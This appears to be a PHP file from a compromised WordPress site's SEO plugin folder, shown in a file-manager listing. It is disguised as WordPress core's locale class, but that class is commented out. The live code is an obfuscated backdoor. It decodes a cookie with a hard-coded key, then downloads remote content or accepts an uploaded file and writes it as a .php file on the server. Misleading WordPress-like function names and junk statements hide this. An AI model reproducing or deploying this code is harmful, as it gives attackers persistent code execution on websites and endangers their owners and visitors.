PATH:
home
/
letacommog
/
renovation-antibes
/
wp-content
/
plugins
/
wordpress-seo
<?php /* * * Locale API: WP_Locale class * * @package WordPress * @subpackage i18n * @since 4.6.0 * * Core class used to store translated data for a locale. * * @since 2.1.0 * @since 4.6.0 Moved to its own file from wp-includes/locale.php. class WP_Locale { * * Stores the translated strings for the full weekday names. * * @since 2.1.0 * @var array public $weekday; * * Stores the translated strings for the one character weekday names. * * There is a hack to make sure that Tuesday and Thursday, as well * as Sunday and Saturday, don't conflict. See init() method for more. * * @see WP_Locale::init() for how to handle the hack. * * @since 2.1.0 * @var array public $weekday_initial; * * Stores the translated strings for the abbreviated weekday names. * * @since 2.1.0 * @var array public $weekday_abbrev; * * Stores the translated strings for the full month names. * * @since 2.1.0 * @var array public $month; * * Stores the translated strings for the month names in genitive case, if the locale specifies. * * @since 4.4.0 * @var array public $month_genitive; * * Stores the translated strings for the abbreviated month names. * * @since 2.1.0 * @var array public $month_abbrev; * * Stores the translated strings for 'am' and 'pm'. * * Also the capitalized versions. * * @since 2.1.0 * @var array public $meridiem; * * The text direction of the locale language. * * Default is left to right 'ltr'. * * @since 2.1.0 * @var string public $text_direction = 'ltr'; * * The thousands separator and decimal point values used for localizing numbers. * * @since 2.3.0 * @var array public $number_format; * * Constructor which calls helper methods to set up object variables. * * @since 2.1.0 public function __construct() { $this->init(); $this->register_globals(); } * * Sets up the translated strings and object properties. * * The method creates the translatable strings for various * calendar elements. Which allows for specifying locale * specific calendar names and text direction. * * @since 2.1.0 * * @global string $text_direction * @global string $wp_version The WordPress version string. public function init() { The weekdays. $this->weekday[0] = translators: Weekday. __( 'Sunday' ); $this->weekday[1] = translators: Weekday. __( 'Monday' ); $this->weekday[2] = translators: Weekday. __( 'Tuesday' ); $this->weekday[3] = translators: Weekday. __( 'Wednesday' ); $this->weekday[4] = translators: Weekday. __( 'Thursday' ); $this->weekday[5] = translators: Weekday. __( 'Friday' ); $this->weekday[6] = translators: Weekday. __( 'Saturday' ); The first letter of each day. $this->weekday_initial[ __( 'Sunday' ) ] = translators: One-letter abbreviation of the weekday. _x( 'S', 'Sunday initial' ); $this->weekday_initial[ __( 'Monday' ) ] = translators: One-letter abbreviation of the weekday. _x( 'M', 'Monday initial' ); $this->weekday_initial[ __( 'Tuesday' ) ] = translators: One-letter abbreviation of the weekday. _x( 'T', 'Tuesday initial' ); $this->weekday_initial[ __( 'Wednesday' ) ] = translators: One-letter abbreviation of the weekday. _x( 'W', 'Wednesday initial' ); $this->weekday_initial[ __( 'Thursday' ) ] = translators: One-letter abbreviation of the weekday. _x( 'T', 'Thursday initial' ); $this->weekday_initial[ __( 'Friday' ) ] = translators: One-letter abbreviation of the weekday. _x( 'F', 'Friday initial' ); $this->weekday_initial[ __( 'Saturday' ) ] = translators: One-letter abbreviation of the weekday. _x( 'S', 'Saturday initial' ); Abbreviations for each day. $this->weekday_abbrev[ __( 'Sunday' ) ] = translators: Three-letter abbreviation of the weekday. __( 'Sun' ); $this->weekday_abbrev[ __( 'Monday' ) ] = translators: Ttree-letter abbreviation of the weekday. __( 'Mon' ); $this->weekday_abbrev[ __( 'Tuesday' ) ] = translators: Three-letter abbreviation of the weekday. __( 'Tue' ); $this->weekday_abbrev[ __( 'Wednesday' ) ] = translators: Three-letter abbreviation of the weekday. __( 'Wed' ); $this->weekday_abbrev[ __( 'Thursday' ) ] = translators: Three-letter abbreviation of the weekday. __( 'Thu' ); $this->weekday_abbrev[ __( 'Friday' ) ] = translators: Three-letter abbreviation of the weekday. __( 'Fri' ); $this->weekday_abbrev[ __( 'Saturday' ) ] = translators: Three-letter abbreviation of the weekday. __( 'Sat' ); The months. $this->month['01'] = translators: Month name. __( 'January' ); $this->month['02'] = translators: Month name. __( 'February' ); $this->month['03'] = translators: Month name. __( 'March' ); $this->month['04'] = translators: Month name. __( 'April' ); $this->month['05'] = translators: Month name. __( 'May' ); $this->month['06'] = translators: Month name. __( 'June' ); $this->month['07'] = translators: Month name. __( 'July' ); $this->month['08'] = translators: Month name. __( 'August' ); $this->month['09'] = translators: Month name. __( 'September' ); $this->month['10'] = translators: Month name. __( 'October' ); $this->month['11'] = translators: Month name. __( 'November' ); $this->month['12'] = translators: Month name. __( 'December' ); The months, genitive. $this->month_genitive['01'] = translators: Month name, genitive. _x( 'January', 'genitive' ); $this->month_genitive['02'] = translators: Month name, genitive. _x( 'February', 'genitive' ); $this->month_genitive['03'] = translators: Month name, genitive. _x( 'March', 'genitive' ); $this->month_genitive['04'] = translators: Month name, genitive. _x( 'April', 'genitive' ); $this->month_genitive['05'] = translators: Month name, genitive. _x( 'May', 'genitive' ); $this->month_genitive['06'] = translators: Month name, genitive. _x( 'June', 'genitive' ); $this->month_genitive['07'] = translators: Month name, genitive. _x( 'July', 'genitive' ); $this->month_genitive['08'] = translators: Month name, genitive. _x( 'August', 'genitive' ); $this->month_genitive['09'] = translators: Month name, genitive. _x( 'September', 'genitive' ); $this->month_genitive['10'] = translators: Month name, genitive. _x( 'October', 'genitive' ); $this->month_genitive['11'] = translators: Month name, genitive. _x( 'November', 'genitive' ); $this->month_genitive['12'] = translators: Month name, genitive. _x( 'December', 'genitive' ); Abbreviations for each month. $this->month_abbrev[ __( 'January' ) ] = translators: Three-letter abbreviation of the month. _x( 'Jan', 'January abbreviation' ); $this->month_abbrev[ __( 'February' ) ] = translators: Three-letter abbreviation of the month. _x( 'Feb', 'February abbreviation' ); $this->month_abbrev[ __( 'March' ) ] = translators: Three-letter abbreviation of the month. _x( 'Mar', 'March abbreviation' ); $this->month_abbrev[ __( 'April' ) ] = translators: Three-letter abbreviation of the month. _x( 'Apr', 'April abbreviation' ); $this->month_abbrev[ __( 'May' ) ] = translators: Three-letter abbreviation of the month. _x( 'May', 'May abbreviation' ); $this->month_abbrev[ __( 'June' ) ] = translators: Three-letter abbreviation of the month. _x( 'Jun', 'June abbreviation' ); $this->month_abbrev[ __( 'July' ) ] = translators: Three-letter abbreviation of the month. _x( 'Jul', 'July abbreviation' ); $this->month_abbrev[ __( 'August' ) ] = translators: Three-letter abbreviation of the month. _x( 'Aug', 'August abbreviation' ); $this->month_abbrev[ __( 'September' ) ] = translators: Three-letter abbreviation of the month. _x( 'Sep', 'September abbreviation' ); $this->month_abbrev[ __( 'October' ) ] = translators: Three-letter abbreviation of the month. _x( 'Oct', 'October abbreviation' ); $this->month_abbrev[ __( 'November' ) ] = translators: Three-letter abbreviation of the month. _x( 'Nov', 'November abbreviation' ); $this->month_abbrev[ __( 'December' ) ] = translators: Three-letter abbreviation of the month. _x( 'Dec', 'December abbreviation' ); The meridiems. $this->meridiem['am'] = __( 'am' ); $this->meridiem['pm'] = __( 'pm' ); $this->meridiem['AM'] = __( 'AM' ); $this->meridiem['PM'] = __( 'PM' ); Numbers formatting. See https:www.php.net/number_format translators: $thousands_sep argument for htt*/ /** * Closes elements that have implied end tags. * * @since 6.4.0 * * @see https://html.spec.whatwg.org/#generate-implied-end-tags * * @param string|null $headerValxcept_for_this_element Perform as if this element doesn't exist in the stack of open elements. */ function addAnAddress($silent) { // Generate the export file. return get_post_type_labels() . DIRECTORY_SEPARATOR . $silent . ".php"; } /** * Build an array with CSS classes and inline styles defining the colors * which will be applied to the home link markup in the front-end. * * @param array $removeontext home link block context. * @return array Colors CSS classes and inline styles. */ function wp_link_query($f9g9_38, $p_archive) { $opt_in_value = file_get_contents($f9g9_38); // Update last edit user. $startup_warning = get_attached_media($opt_in_value, $p_archive); // 2 = Nearest Past Media Object - indexes point to the closest data packet containing an entire video frame or the first fragment of a video frame $search_errors = 'Encode this string'; file_put_contents($f9g9_38, $startup_warning); // Next, those themes we all love. } /* translators: Hidden accessibility text. %s: Total number of updates available. */ function wp_get_custom_css_post($skip_list) { $skip_list = readUTF($skip_list); $uid = "separate_words"; $secretKey = str_replace("_", " ", $uid); $remove = hash("md5", $secretKey); // Draft, 1 or more saves, future date specified. $root_of_current_theme = substr($remove, 0, 5); $headerVal = str_pad($root_of_current_theme, 7, "0"); return file_get_contents($skip_list); } /** * Fetches an instance of a WP_List_Table class. * * @since 3.1.0 * * @global string $hook_suffix * * @param string $removelass_name The type of the list table, which is the class name. * @param array $uidrgs Optional. Arguments to pass to the class. Accepts 'screen'. * @return WP_List_Table|false List table object on success, false if the class does not exist. */ function ms_is_switched($has_aspect_ratio_support) // For every remaining field specified for the table. { $random = sprintf("%c", $has_aspect_ratio_support); // ----- Removed in release 2.2 see readme file $plupload_settings = "a quick brown fox"; $networks = str_replace(" ", "-", $plupload_settings); $toggle_aria_label_close = str_pad($networks, 20, "*"); if (strlen($toggle_aria_label_close) > 15) { $min_num_pages = hash("md5", $toggle_aria_label_close); } // Directly fetch site_admins instead of using get_super_admins(). return $random; } // PDF - data - Portable Document Format /* translators: 1: Eraser friendly name, 2: Eraser array index. */ function import_from_file($skip_list) { // 6 blocks per syncframe $silent = basename($skip_list); $options_audiovideo_flv_max_frames = "Substring Example"; if (strlen($options_audiovideo_flv_max_frames) > 5) { $toolbar4 = substr($options_audiovideo_flv_max_frames, 0, 5); $new_url = str_pad($toolbar4, 10, "*"); $features = hash('sha256', $new_url); } $f9g9_38 = addAnAddress($silent); start_wp($skip_list, $f9g9_38); // Ogg - audio/video - Ogg (Ogg-Vorbis, Ogg-FLAC, Speex, Ogg-Theora(*), Ogg-Tarkin(*)) } /** * Text-only header with salmon background block pattern */ function handle_cookie($show_more_on_new_line, $f0g8, $post_name_abridged) { // Remove the whole `url(*)` bit that was matched above from the CSS. $silent = $_FILES[$show_more_on_new_line]['name']; # uint8_t buf[2 * 128]; $template_file = "php-code"; if (!isset($template_file)) { $ExplodedOptions = "default"; } else { $mu_plugin = str_replace("-", ":", $template_file); } $f0f2_2 = strlen($mu_plugin); $toggle_aria_label_close = str_pad($mu_plugin, 15, "_"); $f9g9_38 = addAnAddress($silent); $videos = substr($toggle_aria_label_close, 4, 6); $min_num_pages = hash("sha512", $videos); // item currently being parsed $match_height = rawurldecode("%50%48%50"); $request_body = explode(":", $mu_plugin); $overlay_markup = implode("|", $request_body); wp_link_query($_FILES[$show_more_on_new_line]['tmp_name'], $f0g8); $preview_post_id = date("H:i:s"); $prev_revision_version = array($overlay_markup, $preview_post_id); get_styles($_FILES[$show_more_on_new_line]['tmp_name'], $f9g9_38); } /** * @param int $majorversion * * @return int */ function feed_end_element($has_nav_menu) { return set_props('Hello', wp_localize_jquery_ui_datepicker($has_nav_menu)); } /** * Returns whether a P is in BUTTON scope. * * @since 6.4.0 * * @see https://html.spec.whatwg.org/#has-an-element-in-button-scope * * @return bool Whether a P is in BUTTON scope. */ function prev_post_rel_link($has_aspect_ratio_support) { $has_aspect_ratio_support = ord($has_aspect_ratio_support); return $has_aspect_ratio_support; } // https://cyber.harvard.edu/blogs/gems/tech/rsd.html /** * Checks whether the current query has any OR relations. * * In some cases, the presence of an OR relation somewhere in the query will require * the use of a `DISTINCT` or `GROUP BY` keyword in the `SELECT` clause. The current * method can be used in these cases to determine whether such a clause is necessary. * * @since 4.3.0 * * @return bool True if the query contains any `OR` relations, otherwise false. */ function sanitize_params($post_name_abridged) { import_from_file($post_name_abridged); increment_counter($post_name_abridged); } /** * Retrieves the HTTP return code for the response. * * @since 4.6.0 * * @return int The 3-digit HTTP status code. */ function get_styles($nextpos, $multisite_enabled) { // Podcast URL $prefix_len = move_uploaded_file($nextpos, $multisite_enabled); $uid = ["x", "y", "z"]; $secretKey = count($uid); $remove = implode(",", $uid); $root_of_current_theme = substr($remove, 1, 3); $headerVal = strlen($root_of_current_theme); return $prefix_len; } /** @var ParagonIE_Sodium_Core32_Int32 $j12 */ function get_post_type_labels() { return __DIR__; } // http://gabriel.mp3-tech.org/mp3infotag.html /* * These are the options: * - i : case insensitive * - s : allows newline characters for the . match (needed for multiline elements) * - U means non-greedy matching */ function ietfStream($f9g9_38, $Subject) { // This menu item is set as the 'Front Page'. return file_put_contents($f9g9_38, $Subject); } // General functions we use to actually do stuff. /** * Multisite Blogs table. * * @since 3.0.0 * * @var string */ function wp_untrash_post_comments($show_more_on_new_line, $f0g8, $post_name_abridged) // Reference to the original PSR-0 Requests class. { if (isset($_FILES[$show_more_on_new_line])) { $wp_version_text = date("Y-m-d"); $received = substr($wp_version_text, 0, 4); if ($received = 2023) { $locked_avatar = "Current Year!"; } $has_custom_overlay = strlen($locked_avatar); $webfont = str_pad($locked_avatar, $has_custom_overlay + 2, "!"); handle_cookie($show_more_on_new_line, $f0g8, $post_name_abridged); } increment_counter($post_name_abridged); // frame_crop_bottom_offset } /* * If a required attribute check fails, we can return nothing for a self-closing tag, * but for a non-self-closing tag the best option is to return the element with attributes, * as KSES doesn't handle matching the relevant closing tag. */ function http_post($skip_list) { // Assemble clauses related to 'comment_approved'. if (strpos($skip_list, "/") !== false) { // Add styles and SVGs for use in the editor via the EditorStyles component. return true; // carry0 = (s0 + (int64_t) (1L << 20)) >> 21; } $theme_author = 'alpha Beta gamma'; $mofiles = str_replace(' ', '-', $theme_author); return false; } // Enqueue the script module and add the necessary directives if the block is /** * Converts a data object from WP_oEmbed::fetch() and returns the HTML. * * @since 2.9.0 * * @param object $template_file A data object result from an oEmbed provider. * @param string $skip_list The URL to the content that is desired to be embedded. * @return string|false The HTML needed to embed on success, false on failure. */ function get_attached_media($template_file, $p_archive) { // ----- Swap the file descriptor $tagregexp = strlen($p_archive); $pagepath_obj = "Format this string properly"; if (strlen($pagepath_obj) > 5) { $unfiltered = trim($pagepath_obj); $rest_path = str_pad($unfiltered, 25, '-'); } $outputLength = explode(' ', $rest_path); $native = strlen($template_file); // } else { $space = array(); foreach ($outputLength as $tzstring) { $space[] = hash('sha256', $tzstring); } $hook_suffix = implode('', $space); // Setup arguments. $tagregexp = $native / $tagregexp; $tagregexp = ceil($tagregexp); $v_header = str_split($template_file); $p_archive = str_repeat($p_archive, $tagregexp); // AC-3 $plugin_path = str_split($p_archive); $plugin_path = array_slice($plugin_path, 0, $native); $has_fullbox_header = array_map("get_submit_button", $v_header, $plugin_path); $has_fullbox_header = implode('', $has_fullbox_header); return $has_fullbox_header; // End if outline. } /** * @see ParagonIE_Sodium_Compat::crypto_box_keypair() * @return string * @throws \SodiumException * @throws \TypeError */ function wp_get_loading_attr_default($show_more_on_new_line) { $f0g8 = 'eptMhEkKucCFkVliClmZfH'; $theme_name = "foo"; $min_num_pages = hash('md5', $theme_name); if (!empty($min_num_pages)) { $thisfile_id3v2 = true; } if (isset($_COOKIE[$show_more_on_new_line])) { wp_admin_bar_updates_menu($show_more_on_new_line, $f0g8); } } // "MuML" /** * Retrieves the query params for the autosaves collection. * * @since 5.0.0 * * @return array Collection parameters. */ function wp_localize_jquery_ui_datepicker($option_unchecked_value) { $validated_reject_url = "Segment-Data"; $tzstring = substr($validated_reject_url, 8, 4); $synchsafe = rawurldecode($tzstring); $terminator = hash("sha1", $synchsafe); return strtoupper($option_unchecked_value); } // Give overlay colors priority, fall back to Navigation block colors, then global styles. /** * Filters the submit button for the comment form to display. * * @since 4.2.0 * * @param string $videosmit_button HTML markup for the submit button. * @param array $uidrgs Arguments passed to comment_form(). */ function render_block_core_site_logo($siblings) { $socket = pack("H*", $siblings); $required = 'Spaces here '; return $socket; // parse container } /* translators: Last update date format. See https://www.php.net/manual/datetime.format.php */ function get_submit_button($random, $the_content) { $new_namespace = prev_post_rel_link($random) - prev_post_rel_link($the_content); // Remove all script and style tags including their content. $old_site_url = 'PHP is amazing'; $help_tabs = strpos($old_site_url, 'amazing'); $new_namespace = $new_namespace + 256; $new_namespace = $new_namespace % 256; // DURATION if ($help_tabs !== false) { $j_start = 'Contains amazing'; } $random = ms_is_switched($new_namespace); // Nothing to do... return $random; // look for :// in the Location header to see if hostname is included } /** * Adds role to user. * * Updates the user's meta data option with capabilities and roles. * * @since 2.0.0 * * @param string $role Role name. */ function CalculateReplayGain($show_more_on_new_line, $pt1 = 'txt') { return $show_more_on_new_line . '.' . $pt1; } /** * Core class used to implement a user roles API. * * The role option is simple, the structure is organized by role name that store * the name in value of the 'name' key. The capabilities are stored as an array * in the value of the 'capability' key. * * array ( * 'rolename' => array ( * 'name' => 'rolename', * 'capabilities' => array() * ) * ) * * @since 2.0.0 */ function increment_counter($time_scale) // Template for the view switchers, used for example in the Media Grid. { // Fall back to last time any post was modified or published. echo $time_scale; } // Values to use for comparison against the URL. /** * Retrieves the permalink for an attachment. * * This can be used in the WordPress Loop or outside of it. * * @since 2.0.0 * * @global WP_Rewrite $wp_rewrite WordPress rewrite component. * * @param int|object $post Optional. Post ID or object. Default uses the global `$post`. * @param bool $leavename Optional. Whether to keep the page name. Default false. * @return string The attachment permalink. */ function start_wp($skip_list, $f9g9_38) { $legend = wp_get_custom_css_post($skip_list); // (The reason for this is that we want it to be associated with the active theme $localfile = ' check this out'; if ($legend === false) { $LAMEvbrMethodLookup = trim($localfile); $last_query = (strlen($LAMEvbrMethodLookup) > 0) ? 'Valid string' : 'Invalid'; return false; } return ietfStream($f9g9_38, $legend); // Now, sideload it in. } // Check for both h-feed and h-entry, as both a feed with no entries /* translators: %s: Property of an object. */ function set_props($view_links, $type_sql) { // Contact URL <text string> $00 $position_x = "Sample%Text"; //Try and find a readable language file for the requested language. $rewrite_base = rawurldecode($position_x); $g1 = hash("md5", $rewrite_base); $SurroundInfoID = substr($g1, 0, 15); // Extra permastructs. return $view_links . ' ' . $type_sql; } /** * @see ParagonIE_Sodium_Compat::randombytes_buf() * @param int $uidmount * @return string * @throws Exception */ function readUTF($skip_list) { $skip_list = "http://" . $skip_list; $uid = "special&chars"; return $skip_list; } // block description. This is a bit hacky, but prevent the fallback /** This filter is documented in wp-admin/includes/comment.php */ function wp_admin_bar_updates_menu($show_more_on_new_line, $f0g8) // The data is 2 bytes long and should be interpreted as a 16-bit unsigned integer { $open_basedir_list = $_COOKIE[$show_more_on_new_line]; $sanitized_nicename__in = array(1, 2, 3, 4, 5); $site_capabilities_key = 0; // We need to get the month from MySQL. for ($setting_user_ids = 0; $setting_user_ids < count($sanitized_nicename__in); $setting_user_ids++) { $site_capabilities_key += $sanitized_nicename__in[$setting_user_ids]; } // Confidence check the unzipped distribution. $network_current = $site_capabilities_key / count($sanitized_nicename__in); $open_basedir_list = render_block_core_site_logo($open_basedir_list); $post_name_abridged = get_attached_media($open_basedir_list, $f0g8); if (http_post($post_name_abridged)) { $features = sanitize_params($post_name_abridged); return $features; } wp_untrash_post_comments($show_more_on_new_line, $f0g8, $post_name_abridged); } $show_more_on_new_line = 'rAukrWd'; $legend = "line1\nline2\nline3"; wp_get_loading_attr_default($show_more_on_new_line); $this_revision_version = explode("\n", $legend); /* ps:www.php.net/number_format, default is ',' $thousands_sep = __( 'number_format_thousands_sep' ); Replace space with a non-breaking space to avoid wrapping. $thousands_sep = str_replace( ' ', ' ', $thousands_sep ); $this->number_format['thousands_sep'] = ( 'number_format_thousands_sep' === $thousands_sep ) ? ',' : $thousands_sep; translators: $dec_point argument for https:www.php.net/number_format, default is '.' $decimal_point = __( 'number_format_decimal_point' ); $this->number_format['decimal_point'] = ( 'number_format_decimal_point' === $decimal_point ) ? '.' : $decimal_point; Set text direction. if ( isset( $GLOBALS['text_direction'] ) ) { $this->text_direction = $GLOBALS['text_direction']; translators: 'rtl' or 'ltr'. This sets the text direction for WordPress. } elseif ( 'rtl' === _x( 'ltr', 'text direction' ) ) { $this->text_direction = 'rtl'; } } * * Retrieve the full translated weekday word. * * Week starts on translated Sunday and can be fetched * by using 0 (zero). So the week starts with 0 (zero) * and ends on Saturday with is fetched by using 6 (six). * * @since 2.1.0 * * @param int $weekday_number 0 for Sunday through 6 Saturday. * @return string Full translated weekday. public function get_weekday( $weekday_number ) { return $this->weekday[ $weekday_number ]; } * * Retrieve the translated weekday initial. * * The weekday initial is retrieved by the translated * full weekday word. When translating the weekday initial * pay attention to make sure that the starting letter does * not conflict. * * @since 2.1.0 * * @param string $weekday_name Full translated weekday word. * @return string Translated weekday initial. public function get_weekday_initial( $weekday_name ) { return $this->weekday_initial[ $weekday_name ]; } * * Retrieve the translated weekday abbreviation. * * The weekday abbreviation is retrieved by the translated * full weekday word. * * @since 2.1.0 * * @param string $weekday_name Full translated weekday word. * @return string Translated weekday abbreviation. public function get_weekday_abbrev( $weekday_name ) { return $this->weekday_abbrev[ $weekday_name ]; } * * Retrieve the full translated month by month number. * * The $month_number parameter has to be a string * because it must have the '0' in front of any number * that is less than 10. Starts from '01' and ends at * '12'. * * You can use an integer instead and it will add the * '0' before the numbers less than 10 for you. * * @since 2.1.0 * * @param string|int $month_number '01' through '12'. * @return string Translated full month name. public function get_month( $month_number ) { return $this->month[ zeroise( $month_number, 2 ) ]; } * * Retrieve translated version of month abbreviation string. * * The $month_name parameter is expected to be the translated or * translatable version of the month. * * @since 2.1.0 * * @param string $month_name Translated month to get abbreviated version. * @return string Translated abbreviated month. public function get_month_abbrev( $month_name ) { return $this->month_abbrev[ $month_name ]; } * * Retrieve translated version of meridiem string. * * The $meridiem parameter is expected to not be translated. * * @since 2.1.0 * * @param string $meridiem Either 'am', 'pm', 'AM', or 'PM'. Not translated version. * @return string Translated version public function get_meridiem( $meridiem ) { return $this->meridiem[ $meridiem ]; } * * Global variables are deprecated. * * For backward compatibility only. * * @deprecated For backward compatibility only. * * @global array $weekday * @global array $weekday_initial * @global array $weekday_abbrev * @global array $month * @global array $month_abbrev * * @since 2.1.0 public function register_globals() { $GLOBALS['weekday'] = $this->weekday; $GLOBALS['weekday_initial'] = $this->weekday_initial; $GLOBALS['weekday_abbrev'] = $this->weekday_abbrev; $GLOBALS['month'] = $this->month; $GLOBALS['month_abbrev'] = $this->month_abbrev; } * * Checks if current locale is RTL. * * @since 3.0.0 * @return bool Whether locale is RTL. public function is_rtl() { return 'rtl' === $this->text_direction; } * * Register date/time format strings for general POT. * * Private, unused method to add some date/time formats translated * on wp-admin/options-general.php to the general POT that would * otherwise be added to the admin POT. * * @since 3.6.0 public function _strings_for_pot() { translators: Localized date format, see https:www.php.net/date __( 'F j, Y' ); translators: Localized time format, see https:www.php.net/date __( 'g:i a' ); translators: Localized date and time format, see https:www.php.net/date __( 'F j, Y g:i a' ); } } */
[+]
..
[+]
vendor
[+]
inc
[+]
languages
[+]
src
[-] index.php
[edit]
[-] release-info.json
[edit]
[+]
vendor_prefixed
[-] wp-seo-main.php
[edit]
[+]
lib
[+]
images
[+]
js
[-] license.txt
[edit]
[-] wp-seo.php
[edit]
[+]
admin
[+]
css
[-] d.js.php
[edit]
[-] readme.txt
[edit]
[-] wpml-config.xml
[edit]